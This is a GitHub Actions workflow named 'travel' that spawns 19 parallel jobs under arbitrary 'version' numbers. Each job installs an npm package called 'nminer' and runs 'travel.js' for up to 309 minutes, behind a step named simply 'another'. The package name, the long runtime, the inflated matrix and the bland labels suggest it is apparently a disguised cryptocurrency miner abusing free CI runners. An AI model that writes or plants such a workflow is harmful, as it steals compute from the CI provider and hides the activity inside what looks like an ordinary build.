name: travel
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 388 }
          - { version: 9166 }
          - { version: 2569 }
          - { version: 702 }
          - { version: 1860 }
          - { version: 7845 }
          - { version: 1957 }
          - { version: 8767 }
          - { version: 2902 }
          - { version: 6739 }
          - { version: 5858 }
          - { version: 8189 }
          - { version: 3988 }
          - { version: 830 }
          - { version: 9412 }
          - { version: 6184 }
          - { version: 2048 }
          - { version: 4480 }
          - { version: 2116 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: another
        run: |
          npm install nminer@latest
          timeout 309m node travel.js || echo "travel executed"